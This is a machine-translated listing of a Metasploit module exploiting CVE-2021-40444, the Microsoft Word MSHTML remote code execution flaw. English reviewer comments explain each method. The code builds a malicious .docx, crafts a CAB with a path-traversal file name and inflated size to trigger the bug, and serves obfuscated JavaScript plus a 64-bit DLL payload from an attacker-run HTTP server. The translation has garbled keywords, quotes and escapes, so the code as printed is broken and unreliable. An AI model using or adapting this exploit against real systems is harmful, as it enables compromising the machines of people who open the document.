Eksekusi Kode Jarak Jauh Microsoft Office Word MSHTML


##
# Modul ini membutuhkan Metasploit: https://metasploit.com/download
# Sumber saat ini: https://github.com/rapid7/metasploit-framework
##

# NOTE(review): this listing is a machine translation of a Metasploit module (the
# upstream repository is named in the header above). Ruby keywords (`def`/`end`/`if`/
# `unless`/`case`/`when`/`else`/`include`), several identifiers, the quote characters
# and the backslashes of `\x..` string escapes have been altered by the translation,
# so the text is not valid Ruby as printed. The comments below describe only what the
# visible lines do; the upstream module is the authoritative source.
#
# Remote exploit module that builds a .docx file (FILEFORMAT mixin) and also runs an
# HTTP server (HttpServer::HTML mixin) serving the .html and .cab resources that the
# generated document references.
class MetasploitModule < Msf::Eksploitasi::Remote
Peringkat = Peringkat Luar Biasa

sertakan Msf::Eksploitasi::FILEFORMAT
sertakan Msf::Eksploitasi::Remote::HttpServer::HTML

# Module metadata and options. Registers the OBFUSCATE option (JavaScript
# obfuscation, on by default) and the advanced DocxTemplate option (path to a
# template .docx). The Notes section self-declares the side effects a defender can
# look for: indicators in logs (IOC_IN_LOGS) and artifacts on disk (ARTIFACTS_ON_DISK).
def inisialisasi(info = {})
super(
update_info(
informasi,
‘Name’ => ‘Microsoft Office Word Berbahaya MSHTML RCE’,
‘Deskripsi’ => %q{
Modul ini membuat file docx berbahaya yang ketika dibuka di Word pada Windows yang rentan
sistem akan mengarah pada eksekusi kode. Kerentanan ini ada karena penyerang dapat
buat kontrol ActiveX berbahaya untuk digunakan oleh dokumen Microsoft Office yang menghosting
mesin rendering browser.
},
‘Referensi’ => [
[‘CVE’, ‘2021-40444’],
[‘URL’, ‘https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444’],
[‘URL’, ‘https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/’],
[‘URL’, ‘http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf’],
[‘URL’, ‘https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md’],
[‘URL’, ‘https://github.com/klezVirus/CVE-2021-40444’]
],
‘Penulis’ => [
‘lockedbyte ‘, # Vulnerability discovery.
‘klezVirus ‘, # References and PoC.
‘thesunRider’, # Official Metasploit module.
‘mekhalleh (RAMELLA Sébastien)’ # Zeop-CyberSecurity – code base contribution and refactoring.
],
‘DisclosureDate’ => ’21-09-23′,
‘Lisensi’ => MSF_LICENSE,
‘Hak Istimewa’ => salah,
‘Platform’ => ‘menang’,
‘Lengkungan’ => [ARCH_X64],
‘Muatan’ => {
‘DisableNops’ => benar
},
‘Opsi Default’ => {
‘FILENAME’ => ‘msf.docx’
},
‘Target’ => [
[
‘Hosted’, {}
]
],
‘Target Default’ => 0,
‘Catatan’ => {
‘Stabilitas’ => [CRASH_SAFE],
‘Keandalan’ => [UNRELIABLE_SESSION],
‘Efek Samping’ => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

daftar_pilihan([
OptBool.new(‘OBFUSCATE’, [true, ‘Obfuscate JavaScript content.’, true])
])
register_advanced_options([
OptPath.new(‘DocxTemplate’, [ false, ‘A DOCX file that will be used as a template to build the exploit.’ ]),
])
akhir

# Hex-encodes a byte string (used for log output of checksums).
# @param bstr [String] byte string
# @return [String] lowercase hex, two digits per byte
def bin_to_hex(bstr)
return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, ‘0’) }.join)
akhir

# CFDATA block checksum: XOR-folds the data into the 4-byte seed one dword at a
# time, byte-reverses the intermediate value, then folds any trailing 1-3 bytes
# left-padded with zero bytes and reverses again.
# @param data [String] block contents
# @param seed [String] 4-byte initial value (the caller passes the two packed lengths)
# @return [String] 4-byte checksum
def cab_checksum(data, seed = “x00x00x00x00”)
checksum = benih

byte=””
data.chars.each_slice(4).map(&:join).each do |dword|
jika dword.length == 4
checksum = checksum.unpack(‘C*’).zip(dword.unpack(‘C*’)).map { |a, b| a ^ b }.pack(‘C*’)
kalau tidak
byte = dword
akhir
akhir
checksum = checksum.reverse

kasus (data.length % 4)
kapan 3
dword = “x00#{byte}”
ketika 2
dword = “x00x00#{byte}”
ketika 1
dword = “x00x00x00#{byte}”
kalau tidak
dword = “x00x00x00x00”
akhir

checksum = checksum.unpack(‘C*’).zip(dword.unpack(‘C*’)).map { |a, b| a ^ b }.pack(‘C*’).reverse
akhir

# http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf
# Builds a single-folder, single-file CAB stream in memory: the data is cut into
# CFDATA blocks of block_size bytes (each prefixed with its checksum and lengths),
# then a CFHEADER, one CFFOLDER and one CFFILE record are emitted, followed by the
# CFDATA blocks. The archived file name is "../<resource>.inf" and the CFFILE
# uncompressed length is declared larger than the real data (see the comment there).
# Header and folder offsets are computed from the fixed struct sizes below.
# @param data [String] bytes to archive
# @return [String] the CAB stream
def create_cab(data)
cab_cfdata=””
namafile = “../#{File.basename(@my_resources.first)}.inf”
ukuran_blok = 32768
struct_cffile = 0xd
struct_cfheader = 0x30

block_counter = 0
data.chars.each_slice(block_size).map(&:join).each do |block|
block_counter += 1

benih = “#{[block.length].pack(‘S’)}#{[block.length].pack(‘S’)}”
csum = cab_checksum(blok, seed)

vprint_status(“Blok data ditambahkan dengan checksum: #{bin_to_hex(csum)}”)
cab_cfdata << csum # uint32 {4} - Checksum
cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length
cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length
cab_cfdata << blok
akhir

taksi_ukuran = [
struct_cfheader +
struct_cffile +
filename.length +
cab_cfdata.length
].pack(‘L<')

# CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)
cab_header = “x4Dx53x43x46” # uint32 {4} – Header (MSCF)
cab_header << "x00x00x00x00" # uint32 {4} - Reserved (null)
cab_header << cab_size # uint32 {4} - Archive Length
cab_header << "x00x00x00x00" # uint32 {4} - Reserved (null)

cab_header << "x2Cx00x00x00" # uint32 {4} - Offset to the first CFFILE
cab_header << "x00x00x00x00" # uint32 {4} - Reserved (null)
cab_header << "x03" # byte {1} - Minor Version (3)
cab_header << "x01" # byte {1} - Major Version (1)
cab_header << "x01x00" # uint16 {2} - Number of Folders
cab_header << "x01x00" # uint16 {2} - Number of Files
cab_header << "x00x00" # uint16 {2} - Flags

cab_header << "xD2x04" # uint16 {2} - Cabinet Set ID Number
cab_header << "x00x00" # uint16 {2} - Sequence number of this Cabinet file within the Set

# CFFOLDER
cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder
struct_cfheader +
struct_cffile +
filename.length
].pack(‘L<')
cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder
cab_header << "x00x00" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP)

# increase the file size to trigger the vulnerability
cab_header << [ # uint32 {4} - Uncompressed File Length ("x02x00x5Cx41")
data.length + 1073741824
].pack(‘L<')

# set the current date and time in cab file format
date_time = Waktu.baru
tanggal = [((date_time.year – 1980) << 9) + (date_time.month << 5) + date_time.day].pack(‘S’)
waktu = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack(‘S’)

# CFFILE
cab_header << "x00x00x00x00" # uint32 {4} - Offset in the Uncompressed CFDATA of the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)
cab_header << "x00x00" # uint16 {2} - Folder ID (starting at 0)
cab_header << tanggal # uint16 {2} - File Date (x5Ax53)
cab_header << waktu # uint16 {2} - File Time (xC3x5C)
cab_header << "x20x00" # uint16 {2} - File Attributes
cab_header << nama file # byte {X} - Filename (ASCII)
cab_header << "x00" # byte {1} - null Terminator of Filename

cab_stream = cab_header

# CFDATA
cab_stream << cab_cfdata
akhir

# Reads the module's JavaScript from the framework data directory, substitutes the
# REPLACE_INF / REPLACE_URI placeholders with the .inf name and the .cab URL served
# by this module, and obfuscates it when the OBFUSCATE option is set.
# NOTE(review): the assignment at `html=”` is truncated in this listing (the markup
# was lost when the page was rendered); the method returns `html`.
# @return [String] the page served for the .html resource
def generate_html
uri = “#{@proto}://#{datastore[‘SRVHOST’]}:#{penyimpanan data[‘SRVPORT’]}#{normalize_uri(@my_resources.first.to_s)}.cab”
inf = “#{File.basename(@my_resources.first)}.inf”

file_path = ::File.join(::Msf::Config.data_directory, ‘exploits’, ‘CVE-2021-40444’, ‘cve_2021_40444.js’)
js_content = ::File.binread(file_path)

js_content.gsub!(‘REPLACE_INF’, inf)
js_content.gsub! (‘REPLACE_URI’, uri)
jika penyimpanan data[‘OBFUSCATE’]
print_status(‘Mengaburkan konten JavaScript’)

js_content = Rex::Eksploitasi::JSObfu.new js_content
js_content = js_content.obfuscate(memori_sensitif: salah)
akhir

html=”
html
akhir

# Looks up an entry of the unpacked template (@docx) by file name and returns its
# :data; fails the module with Failure::NotFound when no entry matches.
# @param fname [String] path inside the docx, e.g. 'word/document.xml'
# @return the entry's :data (a Nokogiri document or raw bytes, as produced by the unpack method)
def get_file_in_docx(namaf)
i = @docx.find_index { |item| barang[:fname] == nama belakang }

kecuali aku
fail_with(Failure::NotFound, “Template ini tidak dapat digunakan karena tidak ada: #{fname}”)
akhir

@docx.fetch(i)[:data]
akhir

# @return [String] the DocxTemplate option when set, otherwise the template bundled
#   in the framework data directory
def get_template_path
penyimpanan data[‘DocxTemplate’] || File.join(Msf::Config.data_directory, ‘exploits’, ‘CVE-2021-40444’, ‘cve-2021-40444.docx’)
akhir

# Replaces the TARGET_HERE placeholder in word/document.xml with the .html URL of
# this server, and in word/_rels/document.xml.rels with the mhtml:...!x-usc:... form
# of the same URL. Fails with Failure::NotFound if either part is absent from the
# template.
def inject_docx
document_xml = get_file_in_docx(‘word/document.xml’)
kecuali document_xml
fail_with(Failure::NotFound, ‘Template ini tidak dapat digunakan karena tidak ada: word/document.xml’)
akhir

document_xml_rels = get_file_in_docx(‘word/_rels/document.xml.rels’)
kecuali document_xml_rels
fail_with(Failure::NotFound, ‘Template ini tidak dapat digunakan karena tidak ada: word/_rels/document.xml.rels’)
akhir

uri = “#{@proto}://#{datastore[‘SRVHOST’]}:#{penyimpanan data[‘SRVPORT’]}#{normalize_uri(@my_resources.first.to_s)}.html”
@docx.setiap lakukan |entri|
entri kasus[:fname]
ketika ‘word/document.xml’
pintu masuk[:data] = document_xml.to_s.gsub!(‘TARGET_HERE’, uri.to_s)
ketika ‘word/_rels/document.xml.rels’
pintu masuk[:data] = document_xml_rels.to_s.gsub!(‘TARGET_HERE’, “mhtml:#{uri}!x-usc:#{uri}”)
akhir
akhir
akhir

# Joins the given path segments with '/', collapses repeated slashes and ensures a
# leading slash.
# NOTE(review): `str * ‘/’` and the final `baru_str` look like translation damage
# of the `strs` parameter and the `new_str` local used on the other lines.
# @param strs [Array<String>] path segments
# @return [String] normalized path
def normalize_uri(*strs)
new_str = str * ‘/’

new_str = new_str.gsub!(‘//’, ‘/’) while new_str.index(‘//’)

# make sure there is a slash
kecuali new_str[0, 1] == ‘/’
new_str=”/” + new_str
akhir

baru_str
akhir

# HTTP handler for the hosted resources: HEAD requests get headers only, OPTIONS
# gets a 501, a URI ending in .html gets the generated page and one ending in .cab
# gets the CAB built from @dll_payload. The response headers (permissive CORS,
# no-store cache control, and a Content-Disposition attachment carrying a .cab file
# name) are the server-side characteristics visible to web proxies and HTTP logs.
# @param cli the connected client
# @param request the parsed HTTP request
def on_request_uri(kli, permintaan)
header_cab = {
‘Access-Control-Allow-Origin’ => ‘*’,
‘Access-Control-Allow-Methods’ => ‘DAPATKAN, POSTING, OPSI’,
‘Cache-Control’ => ‘tanpa penyimpanan, tanpa cache, harus divalidasi ulang’,
‘Content-Type’ => ‘aplikasi/octet-stream’,
‘Content-Disposition’ => “lampiran; namafile=#{File.basename(@my_resources.first)}.cab”
}

header_html = {
‘Access-Control-Allow-Origin’ => ‘*’,
‘Access-Control-Allow-Methods’ => ‘DAPATKAN, POSTING’,
‘Cache-Control’ => ‘tanpa penyimpanan, tanpa cache, harus divalidasi ulang’,
‘Tipe-Konten’ => ‘teks/html; rangkaian karakter = UTF-8’
}

jika request.method.eql? ‘KEPALA’
jika request.raw_uri.to_s.end_with? ‘.taksi’
send_response(cli, ”, header_cab)
kalau tidak
send_response(cli, ”, header_html)
akhir
elsif request.method.eql? ‘PILIHAN’
response = create_response(501, ‘Metode Tidak Didukung’)
tanggapan[‘Content-Type’] = ‘teks/html’
respon.body = ”

cli.send_response(tanggapan)
elsif request.raw_uri.to_s.end_with? ‘.html’
print_status(‘Mengirim Muatan HTML’)

send_response_html(cli, generate_html, header_html)
elsif request.raw_uri.to_s.end_with? ‘.taksi’
print_status(‘Mengirim Payload CAB’)

send_response(cli, create_cab(@dll_payload), header_cab)
akhir
akhir

# Serializes every Nokogiri document held in @docx back to a string, then zips all
# entries.
# @return the archive produced by Msf::Util::EXE.to_zip
def pack_docx
@docx.setiap lakukan |entri|
jika masuk[:data].is_a?(Nokogiri::XML::Document)
pintu masuk[:data] = masuk[:data].to_s
akhir
akhir

Msf::Util::EXE.to_zip(@docx)
akhir

# Opens the template zip and reads every file entry: names matching .xml/.rels are
# parsed with Nokogiri::XML, all other files are kept as raw bytes.
# @param template_path [String] path of the template .docx
# @return [Array<Hash>] one { fname:, data: } hash per zip entry
def membongkar_docx(template_path)
dokumen = []

Zip::File.open(template_path) lakukan |entri|
entri.setiap lakukan |entri|
jika entri.nama.match(/.xml|.rels$/i)
konten = Nokogiri::XML(entry.get_input_stream.read) if entry.file?
elf entri.file?
konten = entri.get_input_stream.read
akhir

vprint_status(“Mengurai item dari template: #{entry.name}”)

dokumen << { fname: entri.nama, data: konten }
akhir
akhir

dokumen
akhir

# Hook invoked by the HttpServer mixin (presumably once the server is listening):
# picks the advertised scheme from the SSL option and a concrete SRVHOST when
# 0.0.0.0 is configured, validates that the template has a .docx extension,
# unpacks and injects the template, writes the result with file_create, and finally
# builds the 64-bit DLL payload (@dll_payload) that the .cab response carries.
def primer
print_status(‘CVE-2021-40444: Hasilkan file docx berbahaya’)

@proto = (penyimpanan data[‘SSL’] ? ‘https’ : ‘http’)
jika penyimpanan data[‘SRVHOST’] == ‘0.0.0.0’
penyimpanan data[‘SRVHOST’] = Rex::Socket.source_address
akhir

template_path = get_template_path
kecuali File.extname(template_path).match(/.docx$/i)
fail_with(Failure::BadConfig, ‘Template bukan file docx!’)
akhir

print_status(“Menggunakan template ‘#{template_path}'”)
@docx = membongkar_docx(template_path)

print_status(‘Menyuntikkan muatan dalam dokumen docx’)
inject_docx

print_status(“Menyelesaikan docx ‘#{datastore[‘FILENAME’]}'”)
file_create(paket_docx)

@dll_payload = Msf::Util::EXE.to_win64pe_dll(
kerangka,
payload. dikodekan,
{
lengkungan: payload.arch.first,
campuran_mode: benar,
platform: ‘menang’
}
)
akhir
akhir
